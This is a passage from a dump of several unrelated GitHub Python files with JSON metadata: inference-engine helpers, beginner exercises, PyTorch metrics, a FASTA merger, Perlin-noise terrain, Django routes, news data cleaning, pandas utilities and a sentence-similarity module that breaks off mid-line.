list1 = output.lemma_embed.get(k)\n v.def_stats.ant_index = list1[0]\n v.def_stats.con_index = list1[1]\n v.def_stats.tot_sent_idx = anc\n\n for e, idx in enumerate(list1[0] + list1[1]):\n list2.append(output.all_sent[idx])\n v.sentences = json.loads(json.dumps(list2))\n\n return\n\n\ndef quick_contradiction(xoutput, youtput):\n xlist = list(filter(lambda x: x[7] == 'c', xoutput.all_sent))\n ylist = list(filter(lambda x: x[7] == 'c', youtput.all_sent))\n xvar = set(map(lambda x: x[2], xlist))\n yvar = set(map(lambda x: x[2], ylist))\n for var in xvar & yvar:\n xtvalue = find_counterpart_inlist(var, xoutput.all_sent, 2, 3)\n ytvalue = find_counterpart_inlist(var, youtput.all_sent, 2, 3)\n if xtvalue != ytvalue:\n return False\n return True\n\n\ndef name_xsent(xoutput):\n for sentence in xoutput.all_sent:\n sentence[2] = name_sent(sentence[1], xoutput.prop_name)\n xoutput.oprop_name.update({sentence[2]: sentence[1]})\n\n\ndef adjust_index2(output, new_sent, list1):\n sentences = output.all_sent\n new_index = []\n for e, num in enumerate(list1):\n if isinstance(num, int):\n new_sent.append(sentences[num])\n new_index.append(len(new_sent) - 1)\n else:\n list2 = []\n for f, cnum in enumerate(num):\n new_sent.append(sentences[cnum])\n list2.append(len(new_sent) - 1)\n new_index.append(list2)\n\n return new_index\n\n\ndef adjust_index(output):\n for k, v in output.trans_def.items():\n new_sent = []\n new_index = adjust_index2(output, new_sent, v.def_stats.ant_index)\n v.def_stats.ant_index = new_index\n new_index = adjust_index2(output, new_sent, v.def_stats.con_index)\n v.def_stats.con_index = new_index\n v.sentences = json.loads(json.dumps(new_sent))\n\n\ndef do_not_instantiate(xoutput, youtput, len_asent):\n output3 = xoutput if youtput == [] else youtput\n for k, v in output3.trans_def.items():\n for e, sent in enumerate(xoutput.all_sent[len_asent:]):\n xoutput.disj_elim.append([e, v.def_stats.def_word_num])\n\n\ndef make_matrix2(xword, yword, lemmata, user):\n kind = consistent_classes(xword, yword, lemmata)\n if kind == 'no definition':\n pass\n else:\n youtput = dictionary.basic_output.get(yword)\n youtput.all_sent = get_basic_sent(yword)\n reload_sentences(youtput, 2)\n xoutput = dictionary.basic_output.get(xword)\n xoutput.all_sent = get_basic_sent(xword)\n xoutput.prop_var = get_prop_var()\n xoutput.prop_name = defaultdict(lambda: xoutput.prop_var.pop(), {})\n name_xsent(xoutput)\n reload_sentences(xoutput, 1)\n modify_variables(youtput, xoutput)\n if not quick_contradiction(xoutput, youtput):\n print ('contradiction found')\n else:\n adjust_index(xoutput)\n adjust_index(youtput)\n do_not_instantiate(xoutput, [], 0)\n len_asent = len(xoutput.all_sent)\n xoutput.all_sent = xoutput.all_sent + youtput.all_sent\n do_not_instantiate(xoutput, youtput, len_asent)\n xoutput.trans_def = {**xoutput.trans_def, **youtput.trans_def}\n for k, v in xoutput.trans_def.items(): add_to_gsent([v], xoutput)\n if xoutput.gsent != []:\n fill_tsent(xoutput, xword, yword, len_asent)\n loop_through_gsent(xoutput, \"lemmas2\", dictionary)\n consistent = True if xoutput.total_sent[-1][1] == consist else False\n rearrange(\"last\", xoutput, consistent, \"lemmas2\", xoutput.main_var)\n\n return\n\n\ndef fill_tsent(xoutput, xword, yword, len_asent):\n xoutput.tindex = 0\n basic_defintion = dictionary.basic_definitions.get(xword)\n add_to_tsent(xoutput, basic_defintion)\n basic_defintion = dictionary.basic_definitions.get(yword)\n add_to_tsent(xoutput, basic_defintion)\n for sent in xoutput.all_sent[:len_asent]:\n if sent[7] == 'c':\n add_to_tsent(xoutput, sent[1], \"\", sent[3], \"&E\", 1)\n for sent in xoutput.all_sent[len_asent:]:\n if sent[7] == 'c':\n add_to_tsent(xoutput, sent[1], \"\", sent[3], \"&E\", 2)\n for k, v in xoutput.trans_def.items():\n anc1 = v.def_stats.tot_sent_idx\n add_to_tsent(xoutput, v.def_stats.natural_sent, \"\", \"\", \"&E\", anc1)\n\n\ndef adjust_prop_name(output):\n nprop_name = {}\n for k, v in output.prop_name.items():\n s = k.split()\n s = \"\".join(s)\n nprop_name.update({s: v})\n\n output.prop_name = nprop_name\n\n\ndef get_from_all_sent(num, output, sentences, list2):\n idx = findposinmd(sentences[num][0], output.all_sent, 0)\n if idx == -1:\n output.all_sent.append(sentences[num])\n list2.append(len(output.all_sent) - 1)\n else:\n list2.append(idx)\n\n\ndef adjust_sides(list1, output, sentences):\n list2 = []\n for e, num in enumerate(list1):\n if isinstance(num, int):\n get_from_all_sent(num, output, sentences, list2)\n else:\n list3 = []\n for cnum in num:\n get_from_all_sent(cnum, output, sentences, list3)\n list2.append(json.loads(json.dumps(list3)))\n\n return list2\n\n\ndef eliminate_possessive():\n test_lemmas = []\n for e, word in enumerate(words_used):\n if word[-2:] == \"'s\":\n test_lemmas.append(word[:-2])\n elif word in dictionary.rel_abbrev.keys():\n pass\n else:\n pos = dictionary.pos.get(word)\n if pos != None:\n if pos[0] in ['n', 'a', 'r']:\n test_lemmas.append(word)\n\n return test_lemmas\n\n\ndef make_matrix(user):\n global dictionary\n pkl_file = open(user + 'z_dict_words.pkl', 'rb')\n dictionary = pickle.load(pkl_file)\n pkl_file.close()\n lemmata = {}\n word_list = []\n words_used = eliminate_possessive()\n for xword in words_used:\n for yword in words_used:\n if xword[0] != yword[0]:\n list1 = [xword[0], yword[0]]\n list1.sort()\n if list1 != ['o', 'o']:\n if list1 not in word_list:\n consistent_classes(xword, yword, lemmata)\n\n temp = open(user + 'lemmata.pkl', 'wb')\n pickle.dump(lemmata, temp)\n temp.close()\n\n return","repo_name":"kylefoley76/inference_engine","sub_path":"inference2/Proofs/instantiate_lemmas.py","file_name":"instantiate_lemmas.py","file_ext":"py","file_size_in_byte":16977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16079374775","text":"\n#Given an integer, take the individual digits and add them togeather\nif False:\n input = 39\n\n print(type(input))\n inputString = str(input)\n\n result = 0\n for char in inputString:\n result += int(char)\n\n print(result)\n\n\n#BMI Calculator\nif False:\n height = input(\"Please enter your height (m):\\n\")\n weight = input(\"Please enter your weight (kg):\\n\")\n\n heightFloat = float(height)\n weightFloat = float(weight)\n\n bmi = weightFloat / (heightFloat ** 2)\n bmiInteger = int(bmi)\n print(\"Your BMI is: \" + str(bmiInteger))\n\n\n#Based off the age of 90\n#Calculate how many weeks a person has given their age\nif False:\n totalPossibleWeeks = 52*90\n currentWeeksUsed = 52 * int(input(\"How old are you?\\n\"))\n currentWeeksLeft = totalPossibleWeeks - currentWeeksUsed\n\n print(f\"You have {currentWeeksLeft} weeks left.\")\n","repo_name":"unconnnected/python-100","sub_path":"002_dataTypes/002_exercises.py","file_name":"002_exercises.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7667325051","text":"import numpy as np\nimport torch\n\n@torch.no_grad()\ndef gaussian_nll_l(pred, data, params):\n min_dist = params[\"min_dist\"]\n\n pdists = pred[\"dists\"]\n means = pdists[:,:,0]\n lvars = pdists[:,:,1]\n\n nll = ((means - data.ldists) / lvars.exp())**2 / 2 + lvars\n w = data.node_norm[data.cell_mask].sqrt()\n weights = torch.outer(w, w)\n\n metric = torch.mean(nll * weights)\n\n return metric.item()\n\n@torch.no_grad()\ndef mean_mean_l(pred, data, params):\n pdists = pred[\"dists\"]\n means = pdists[:,:,0]\n mean_mean = torch.mean(means)\n\n return mean_mean.item()\n\n@torch.no_grad()\ndef mean_std_l(pred, data, params):\n pdists = pred[\"dists\"]\n lvars = pdists[:,:,1]\n std = torch.exp(lvars / 2)\n mean_std = torch.mean(std)\n\n return mean_std.item()\n\n@torch.no_grad()\ndef mse(pred, data, params, lbound=0., ubound=np.inf):\n pdists = pred[\"dists\"]\n\n idx = (data.dists >= lbound) & (data.dists <= ubound)\n err = ((pdists - data.dists)**2)[idx]\n # print(data.dists) ####\n\n metric = torch.mean(err)\n\n return metric.item()\n\n@torch.no_grad()\ndef mse_l(pred, data, params, lbound=0., ubound=np.inf):\n pdists = pred[\"dists\"]\n means = pdists[:,:,0]\n emeans = torch.exp(means)\n\n idx = (data.dists >= lbound) & (data.dists <= ubound)\n err = ((emeans - data.dists)**2)[idx]\n\n metric = torch.mean(err)\n\n return metric.item()\n\n@torch.no_grad()\ndef mse_log(pred, data, params):\n pdists = pred[\"dists\"]\n means = pdists[:,:,0]\n\n metric = torch.mean((means - data.ldists)**2)\n\n return metric.item()\n\n@torch.no_grad()\ndef mean_chisq_l(pred, data, params):\n pdists = pred[\"dists\"]\n means = pdists[:,:,0]\n lvars = pdists[:,:,1]\n std = torch.exp(lvars / 2)\n\n chisq = ((data.ldists - means) / std)**2\n metric = torch.mean(chisq)\n\n return metric.item()\n\ndef _get_ranks(x, device):\n tmp = x.argsort(dim=1)\n ranks = torch.zeros_like(tmp, device=device)\n for i in range(x.shape[0]):\n ranks[i,tmp[i,:]] = torch.arange(len(x), device=device)\n return ranks\n\n@torch.no_grad()\ndef spearman(pred, data, params):\n device = params[\"device\"]\n\n pdists = pred[\"dists\"]\n\n x_rank = _get_ranks(pdists, device)\n y_rank = _get_ranks(data.dists, device)\n\n n = x_rank.shape[1]\n upper = 6 * torch.sum((x_rank - y_rank).pow(2), dim=1)\n down = n * (n ** 2 - 1.0)\n rs = 1.0 - (upper / down)\n\n return torch.mean(rs).item()\n\n@torch.no_grad()\ndef spearman_l(pred, data, params):\n device = params[\"device\"]\n\n pdists = pred[\"dists\"]\n means = pdists[:,:,0]\n\n x_rank = _get_ranks(means, device)\n y_rank = _get_ranks(data.ldists, device)\n\n n = x_rank.shape[1]\n upper = 6 * torch.sum((x_rank - y_rank).pow(2), dim=1)\n down = n * (n ** 2 - 1.0)\n rs = 1.0 - (upper / down)\n\n return torch.mean(rs).item()\n\ndef _trilaterate3D(rad, pos):\n # print(rad) ####\n # print(pos) ####\n p1 = pos[0,:]\n p2 = pos[1,:]\n p3 = pos[2,:]\n p4 = pos[3,:]\n\n r1 = rad[0]\n r2 = rad[1]\n r3 = rad[2]\n r4 = rad[3]\n\n e_x = (p2 - p1) / np.linalg.norm(p2 - p1)\n i = np.dot(e_x, (p3 - p1))\n e_y = (p3 - p1 - (i * e_x)) / (np.linalg.norm(p3 - p1 - (i * e_x)))\n e_z = np.cross(e_x, e_y)\n d = np.linalg.norm(p2 - p1)\n j = np.dot(e_y, (p3 - p1))\n x = (r1**2 - r2**2 + d**2) / (2 * d)\n y = ((r1**2 - r3**2 + i**2 + j**2 ) / 2 * j) - ((i / j) * x)\n z1 = np.sqrt(r1**2 - x**2 - y**2)\n z2 = -z1\n # print(x, y, z1) ####\n ans1 = p1 + (x * e_x) + (y * e_y) + (z1 * e_z)\n ans2 = p1 + (x * e_x) + (y * e_y) + (z2 * e_z)\n dist1 = np.linalg.norm(p4 - ans1)\n dist2 = np.linalg.norm(p4 - ans2)\n\n if np.abs(r4 - dist1) < np.abs(r4 - dist2):\n return ans1\n else: \n return ans2\n\n_trilaterate3D_v = np.vectorize(_trilaterate3D, excluded=[1], signature=\"(n)->(m)\")\n\n@torch.no_grad()\ndef tril_cons(pred, data, params, num_trials=5):\n pdists = pred[\"dists\"].cpu().detach().numpy() \n locs = data.pos[data.cell_mask].cpu().detach().numpy()\n ncells = locs.shape[0]\n preds = []\n for _ in range(num_trials):\n sel = np.random.choice(ncells, 4, replace=False)\n rad = pdists[:,sel]\n pos = locs[sel,:]\n pred = _trilaterate3D_v(rad, pos)\n # print(pred) ####\n preds.append(pred)\n\n preds = np.array(preds)\n preds -= np.nanmean(preds, axis=0, keepdims=True)\n\n mnorms = np.nanmean(np.sqrt((preds**2).sum(axis=2)))\n\n return mnorms\n\n@torch.no_grad()\ndef acc(pred, data, params):\n logits = pred[\"logits\"]\n bin_preds = (logits >= 0)\n\n acc = (bin_preds == data.adjs)\n\n metric = acc.float().mean()\n\n return metric.item()\n\n@torch.no_grad()\ndef f1(pred, data, params):\n logits = pred[\"logits\"]\n bin_preds = (logits >= 0)\n\n tp = (bin_preds & data.adjs).float().sum()\n fp = (bin_preds & ~data.adjs).float().sum()\n fn = (~bin_preds & data.adjs).float().sum()\n\n metric = tp / (tp + (fp + fn) / 2)\n\n return metric.item()\n\n@torch.no_grad()\ndef mcc(pred, data, params):\n logits = pred[\"logits\"]\n bin_preds = (logits >= 0)\n\n tp = (bin_preds & data.adjs).float().sum()\n tn = (~(bin_preds | data.adjs)).float().sum()\n fp = (bin_preds & ~data.adjs).float().sum()\n fn = (~bin_preds & data.adjs).float().sum()\n\n metric = (\n (tp * tn - fp * fn) \n / torch.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))\n )\n\n return metric.item()\n\n@torch.no_grad()\ndef nll_vae_struct(pred, data, params):\n nll = ((pred[\"coords\"] - data.cell_pos)**2).sum(dim=1) / 2\n metric = nll.mean()\n\n return metric.item()\n\n@torch.no_grad()\ndef nll_vae_sup(pred, data, params):\n nll = ((pred[\"coords_from_exp\"] - data.cell_pos)**2).sum(dim=1) / 2\n metric = nll.mean()\n\n return metric.item()\n\n@torch.no_grad()\ndef nll_vae_exp(pred, data, params):\n nll = ((pred[\"exp\"] - data.cell_exp)**2).sum(dim=1) / 2\n metric = nll.mean()\n\n return metric.item()\n\ndef _kl(mean_0, std_0, lstd_0, mean_1, std_1, lstd_1):\n kl = (\n (std_0**2 + (mean_1 - mean_0)**2) / (2 * std_1**2) \n + lstd_1 \n - lstd_0 \n - 0.5\n ).sum(dim=1)\n\n return kl\n\n@torch.no_grad()\ndef kl_vae_exp(pred, data, params):\n kl = _kl(pred[\"emb_mean\"], pred[\"emb_std\"], pred[\"emb_lstd\"], 1., 1., 0.)\n metric = kl.mean()\n\n return metric.item()\n\n@torch.no_grad()\ndef kl_vae_struct(pred, data, params):\n kl = _kl(pred[\"aux_enc_mean\"], pred[\"aux_enc_std\"], pred[\"aux_enc_lstd\"], pred[\"emb_mean\"], pred[\"emb_std\"], pred[\"emb_lstd\"])\n metric = kl.mean()\n \n return metric.item()\n","repo_name":"austintwang/st_gnn","sub_path":"model/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":6543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71476720874","text":"import sys\nimport os\nfrom Bio import SeqIO\n\nmatchfile = sys.argv[1]\ninfile = open(matchfile)\nlines = infile.read()\ninfile.close\n\nlines=lines.split('\\n') #split on return\nlines=[line for line in lines if line.strip() !=\"\"] #remove empty lines\n\nmatch={}\nfor i in lines: \n\tmatch[i.split('\\t')[0]]=i\n\nfor i in match: #Iterate through matches\n\tjan=match[i].split('\\t')[1] + '.final.fas'\n\tburk=match[i].split('\\t')[0] + '.final.fas'\n\n\tgreg_d = {'Gregarina_sp_Pseudo_7':'Gregarina_sp_Pseudo', 'Gregarina_sp_Pseudo_8':'Gregarina_sp_Pseudo', 'Gregarina_sp_Pseudo_9':'Gregarina_sp_Pseudo','Gregarina_sp_Poly_1_total':'Gregarina_sp_Poly', 'Gregarina_sp_Poly_29':'Gregarina_sp_Poly', 'Gregarina_sp_Poly_39':'Gregarina_sp_Poly', 'Protomagalhaensia_sp_Gyna_25':'Protomagalhaensia_sp_Gyna', 'Protomagalhaensia_sp_Gyna_26':'Protomagalhaensia_sp_Gyna', 'Protomagalhaensia_wolfi_75':'Protomagalhaensia_wolfi', 'Protomagalhaensia_wolfi_77':'Protomagalhaensia_wolfi', 'Protomagalhaensia_wolfi_80':'Protomagalhaensia_wolfi', 'Blabericola_migrator_1_total':'Blabericola_migrator', 'Blabericola_migrator_2_total':'Blabericola_migrator'}\n\n\tburki = SeqIO.parse(burk, \"fasta\") #Parse burki fasta\n\tjanou = SeqIO.parse(jan, \"fasta\") #Parse Jan fasta\n\t\n\tburki_d = {} #create empty dictionary that will be filled with the burki data \n\n\tfor i in burki: # iterate through burki fasta\n\t\tbh = i.id #assign fasta header as bh\n\t\tbs = i.seq #assign sequence as bs\n\t\tbhr = bh.split('__')[0] #remove the contig ID info from bh\n\t\tif bhr not in greg_d: #iterate through the keys/values in gregarine renaming dictionary\n\t\t\tburki_d[bhr]=i #add jhr as key to burki_d and add the entire record as values\n\t\telse:\n\t\t\tfor k,v in greg_d.items():\n\t\t\t\tif k == bhr:\n\t\t\t\t\tbhr=v\n\t\t\t#print (bhr)\n\t\t\tburki_d[bhr] = i #add the unmodified bh as merged dictionary key and the initial fasta header (with contig ID) and sequence to the dictioanry as values \n\tfor i in janou: #iterate through jan fasta\n\t\tjh = i.id #assign fasta header as jh\n\t\tjs = i.seq #assign sequence as js\n\t\tjhr = jh.split('__')[0] #remove the contig ID info from jh to name jhr\n\t\tif jhr in burki_d:\n\t\t\tpass\n\t\telse:\n\t\t\tif jhr not in greg_d:\n\t\t\t\tburki_d[jhr]=i #add jhr as key to burki_d and add the entire record as values\n\t\t\telse:\n\t\t\t\tfor k2,v2 in greg_d.items(): #iterate through keys and values in greg renaming dictionary\n\t\t\t\t\tif jhr == k2: # if the jan fasta header is in greg_d renaming dictionary\n\t\t\t\t\t\tjhr=v2 # renane jh with the value from greg dictionary\n\t\t\t\t\t\tburki_d[jhr] = i #assign record to key jhr\n\twith open(jan+\".merged.fas\", \"w\") as merged:\n\t\tSeqIO.write(burki_d.values(), merged, \"fasta\")\n\n\n","repo_name":"EricSalomaki/RandomPythonScripts","sub_path":"merge_greg_fastas.py","file_name":"merge_greg_fastas.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74206447274","text":"from random import randrange\nfrom Vector2 import Vector2\nfrom main import * \nimport math\n\nclass Perlin():\n def interpolate(pa, pb, px):\n ft = px * 3.141593\n f = (1 - math.cos(ft)) * 0.5\n return pa * (1 - f) + pb * f\n \n def interpolateTwo(pa, pb, px):\n return pa * (1 - px) + pb * px\n\n def __init__(self, amp = 100, wl = 100, w = 100, h = 100, fq = 1/100):\n self.x = 0\n self.yStart = 0\n self.y = self.yStart \n \n self.w = w\n self.h = h\n \n self.amp = amp # amplitude\n self.wl = wl # wavelength\n self.fq = fq # frequency\n \n self.M = 4294967296 # a - 1 should be divisible by m's prime factors\n self.A = 166452 #c and m should be co-prime\n self.C = 1\n \n self.Z = math.floor(random.randrange(1000)/1000 * self.M)\n \n self.a = self.rand()\n self.b = self.rand()\n \n def rand(self):\n self.Z = (self.A * self.Z + self.C) % self.M\n return self.Z / self.M\n \n def create(self):\n heights = []\n while(self.x < self.w):\n if (self.x % self.wl == 0):\n self.a = self.b\n self.b = self.rand()\n self.y = self.yStart + self.a * self.amp\n else:\n self.y = self.yStart + Perlin.interpolate(self.a, self.b, (self.x % self.wl) / self.wl) * self.amp\n heights.append(self.y)\n self.x += 1\n return heights\n \n #octave generator\n def GenerateNoise(amp, wl, octaves, divisor, width):\n result = []\n for i in range(octaves):\n result.append(Perlin(amp, wl, width).create())\n amp /= divisor\n wl /= divisor\n return result\n\n #combines octaves together\n def CombineNoise(resultsList):\n final = []\n for index in range(len(resultsList[0])):\n total = 0.0\n for list in range(len(resultsList)):\n total += resultsList[list][index]\n final.append(total)\n return final\n \n\n\nclass Terrain():\n \n mapSize = (256,1000)\n gridWorth = 33\n\n\n groundNums = [2,3,4,5,6,7]\n terrainMap = np.zeros(mapSize, dtype=np.uint8)\n colors = [None, (100,100,200), (50,50,50), (200,200,200)]\n \n \n octaves = 8\n heights = Perlin.CombineNoise(Perlin.GenerateNoise(128,128,octaves,2,mapSize[1]))\n firstHeight = mapSize[0]-round(heights[5])\n \n for col in range(len(terrainMap[0])):\n startHeight = heights[col]\n for row in range(mapSize[0]-round(startHeight),len(terrainMap)):\n terrainMap[row][col] = 2\n #\n \n \n for i in range(len(terrainMap)):\n for j in range(len(terrainMap[0])):\n if terrainMap[i][j] == 2 and i < 100:\n terrainMap[i][j] = 3\n if terrainMap[i][j] == 0 and i > 150:\n terrainMap[i][j] = 1\n \n \n plt.imshow(terrainMap)\n plt.show()\n \n def isCollider(x, y):\n if y//Terrain.gridWorth >= 0 and y//Terrain.gridWorth < len(Terrain.terrainMap) and x//Terrain.gridWorth >= 0 and x//Terrain.gridWorth < len(Terrain.terrainMap[0]):\n if Terrain.terrainMap[y//Terrain.gridWorth][x//Terrain.gridWorth] in Terrain.groundNums:\n return True\n return False\n\n def getBlockType(x, y):\n if y//Terrain.gridWorth >= 0 and y//Terrain.gridWorth < len(Terrain.terrainMap) and x//Terrain.gridWorth >= 0 and x//Terrain.gridWorth < len(Terrain.terrainMap[0]):\n return Terrain.terrainMap[y//Terrain.gridWorth][x//Terrain.gridWorth]\n \n def getIndexes(x,y):\n return y//Terrain.gridWorth, x//Terrain.gridWorth\n","repo_name":"TylerW546/2DExploration","sub_path":"terrain.py","file_name":"terrain.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4484013924","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"home/\",views.auditor_home,name=\"auditor\"),\n \n path(\"message/chat/\",views.chat_rooms,name=\"chat_rooms\"),\n path(\"message/chat/\",views.message_chat,name=\"message_chat\"),\n path(\"message/chat/auditor/send\",views.auditor_send,name=\"auditor_send\"),\n path(\"message/chat/getMessages/\",views.getMessages,name=\"getMessages\"),\n\n path(\"requests/\",views.request_list,name=\"auditor_request_list\"),\n path(\"requests//detail/\",views.request_detail,name=\"auditor_request_detail\"),\n path(\"requests//detail/change_nurse\",views.change_nurse,name=\"change_nurse\"),\n\n\n path(\"results/\",views.result_list,name=\"test_result_list\"),\n path(\"results//detail\",views.result_detail,name=\"test_result_detail\"),\n path(\"results//approve\",views.approve_result,name=\"approve_result\"),\n path(\"results//update\", views.result_update, name=\"result_update\"),\n \n path(\"reports/\",views.report_list,name=\"report_list\"),\n path(\"reports//detail/\",views.report_detail,name=\"report_detail\"),\n]","repo_name":"AdemBendjama/Brave-Lab","sub_path":"auditor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70479654312","text":"import pickle\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.stem import WordNetLemmatizer\r\n\r\n\r\n# Function to load cached data from a file\r\ndef load_cached_data(cache_filename):\r\n try:\r\n with open(cache_filename, 'rb') as cache_file:\r\n return pickle.load(cache_file)\r\n except FileNotFoundError:\r\n return None\r\n\r\n\r\n# Function to filter data based on keywords\r\ndef filter_data(pre_processed_data, keywords):\r\n cleaned_data = []\r\n for article in pre_processed_data:\r\n # Check if any keyword is present in the lowercase title or description\r\n if any(keyword.lower() in article[\"title\"].lower() or keyword.lower()\r\n in article[\"description\"].lower() for keyword in keywords):\r\n cleaned_article = {\r\n \"title\": article[\"title\"],\r\n \"description\": article[\"description\"],\r\n \"published date\": article[\"published date\"],\r\n \"url\": article[\"url\"],\r\n \"publisher\": article[\"publisher\"],\r\n \"sentiment\": article[\"sentiment\"]\r\n }\r\n cleaned_data.append(cleaned_article)\r\n\r\n print(\"Total number of filtered articles:\", len(cleaned_data))\r\n\r\n return cleaned_data\r\n\r\n\r\n# Function to preprocess text using tokenization, lemmatization, and stopword removal\r\ndef preprocess_text(text, vocab, unk_id):\r\n tokens = word_tokenize(text)\r\n tokens = [token.lower() for token in tokens]\r\n\r\n # Lemmatization\r\n lemmatizer = WordNetLemmatizer()\r\n tokens = [lemmatizer.lemmatize(token) for token in tokens]\r\n\r\n # Remove stopwords\r\n stop_words = set(stopwords.words('english'))\r\n tokens = [token for token in tokens if token not in stop_words]\r\n\r\n # Map tokens to their integer IDs using the provided vocabulary\r\n ids = [vocab.get(token, unk_id) for token in tokens]\r\n return ids\r\n","repo_name":"ronniepiku/SANTA","sub_path":"Data/data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10935623848","text":"\"\"\"\nCommon Functions\n\"\"\"\n\nfrom urllib.parse import unquote\nimport re\n\nimport pandas as pd\n\n\ndef is_integer(n):\n \"\"\"Determines the provided string is an integer number.\"\"\"\n try:\n float(n)\n except ValueError:\n return False\n else:\n return float(n).is_integer()\n\n\ndef extract_integer_from_string(s):\n \"\"\"Extracts integer from string provided.\"\"\"\n m = re.search(r'(\\d+)', s)\n if m:\n return int(m.group(1))\n\n\ndef change_column_type(df: pd.DataFrame, to_date=None, to_datetime=None):\n \"\"\"Changes column type in dataframe from str to date or datetime.\"\"\"\n if not to_date:\n to_date = ['date', 'firstSessionDate']\n if not to_datetime:\n to_datetime = ['dateHour', 'dateHourMinute']\n\n for col in df.columns:\n if col in to_date:\n df[col] = pd.to_datetime(df[col], infer_datetime_format=True, errors='coerce').dt.date\n if col in to_datetime:\n df[col] = pd.to_datetime(df[col], infer_datetime_format=True, errors='coerce')\n\n return df\n\n\ndef replace_columns(df: pd.DataFrame, rules: list):\n \"\"\"Converts dataframe columns using regex.\n\n Args\n df: dataframe to be converted\n rules: list of tuple (column name, regex, to)\n \"\"\"\n for r in rules:\n col, rule, to = r\n try:\n _ = df[col].replace(rule, to, inplace=True, regex=True)\n except KeyError as e:\n print(e)\n pass\n\n\ndef prep_df(df, delete_columns: list = None, type_columns: dict = None, rename_columns: dict = None):\n \"\"\"Processes dataframe\n\n Args\n delete_columns:\n list of column name to be deleted\n type_columns:\n dict of column name -> data type\n ex. {'pageviews': 'int32'}\n rename_columns:\n dict of column name -> new column name\n Returns\n processed dataframe\n \"\"\"\n if len(df) > 0:\n if delete_columns:\n # delete\n df.drop(delete_columns, axis=1, inplace=True)\n if type_columns:\n # change type\n df = df.astype(type_columns)\n if rename_columns:\n # rename\n df.columns = df.columns.to_series().replace(rename_columns, regex=True)\n return df\n\n\ndef get_date_range(start_date: str, end_date: str, format_: str = '%Y-%m-%d'):\n \"\"\"Converts date range to a list of each date in the range.\"\"\"\n date_range = pd.date_range(start_date, end_date)\n return [d.strftime(format_) for d in date_range]\n\n\ndef get_chunked_list(original_list: list, chunk_size: int = 100):\n \"\"\"Splits a list into chunks.\"\"\"\n chunked_list = []\n for i in range(0, len(original_list), chunk_size):\n chunked_list.append(original_list[i:i + chunk_size])\n return chunked_list\n\n\ndef get_clean_url(url: str, params_to_keep: list = None):\n \"\"\"Remove parameters from URL Query String\"\"\"\n\n if not params_to_keep:\n params_to_keep = []\n\n if \"?\" in url:\n base_url, arglist = url.split(\"?\", 1)\n args = arglist.split(\"&\")\n new_args = []\n for arg in args:\n try:\n k, v = arg.split(\"=\", 1)\n except ValueError:\n k = arg\n if k.lower() in params_to_keep:\n new_args.append(unquote(arg))\n # print(f\"keeping {arg}\")\n else:\n # print(f\"deleting {arg}\")\n pass\n if len(new_args) > 0:\n # if param remains\n return \"?\".join([base_url, \"&\".join(new_args)])\n else:\n # all params are removed\n return base_url\n else:\n return url\n","repo_name":"mak00s/megaton","sub_path":"megaton/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22145505010","text":"import numpy as np\nfrom gensim.models.fasttext import FastText\nfrom nltk.tokenize import word_tokenize\nfrom nltk import RegexpTokenizer\nimport tensorflow as tf\nimport tensorflow.keras.backend as K\nfrom keras.models import load_model\n\nbase_path = \"/Users/adamfdhl/Documents/Adam/College/Code/semantic-similarity\"\nglobal model_embedding\nglobal deep_module\n\ndef diff_sentence_length(sentence_1, sentence_2):\n len_sentence_1 = len(sentence_1)\n len_sentence_2 = len(sentence_2)\n\n return abs(len_sentence_1 - len_sentence_2)/(len_sentence_1 + len_sentence_2)\n\ndef cosine_similarity(sentence_1, sentence_2):\n # tokenization\n list_1 = word_tokenize(sentence_1.lower())\n list_2 = word_tokenize(sentence_2.lower())\n\n # into set of words\n set_1 = {w for w in list_1}\n set_2 = {w for w in list_2}\n\n vector_1 = []\n vector_2 = []\n\n # form a set containing keywords of both strings \n rvector = set_1.union(set_2) \n for w in rvector: \n if w in set_1: \n vector_1.append(1)\n else: vector_1.append(0)\n if w in set_2: \n vector_2.append(1)\n else: vector_2.append(0)\n c = 0\n\n # calculate cosine \n for i in range(len(rvector)): \n c+= vector_1[i]*vector_2[i] \n cosine = c / float((sum(vector_1)*sum(vector_2))**0.5) \n return cosine\n\ndef shallow_module(sentence_1, sentence_2):\n diff_length = diff_sentence_length(sentence_1, sentence_2)\n cosine = cosine_similarity(sentence_1, sentence_2)\n\n return cosine - diff_length\n\ndef to_vector(sentence, feature_size = 300, max_len=100):\n tokenized_sentence = word_tokenize(sentence)\n\n tokenizer = RegexpTokenizer(r\"\\w+\")\n words = tokenizer.tokenize(sentence)\n\n words = tokenizer.tokenize(sentence)\n clean_words = [word for word in words if word.isalpha()]\n fix_words = [word for word in clean_words if len(word) > 1]\n sentence_embeddings = []\n\n for word in fix_words:\n sentence_embeddings.append(model_embedding.wv[word])\n if (len(sentence_embeddings) >= max_len):\n break\n \n sentence_embeddings = sentence_embeddings + [[0] * feature_size\n for _ in range(max(0, max_len - len(sentence_embeddings)))\n ]\n sentence_embeddings = np.array(sentence_embeddings).astype(np.float32)\n\n return sentence_embeddings\n\ndef compute_pearson(y_true, y_pred):\n # Pearson's correlation coefficient = covariance(X, Y) / (stdv(X) * stdv(Y))\n fs_pred = y_pred - np.mean(y_pred)\n fs_true = y_true - np.mean(y_true)\n covariance = 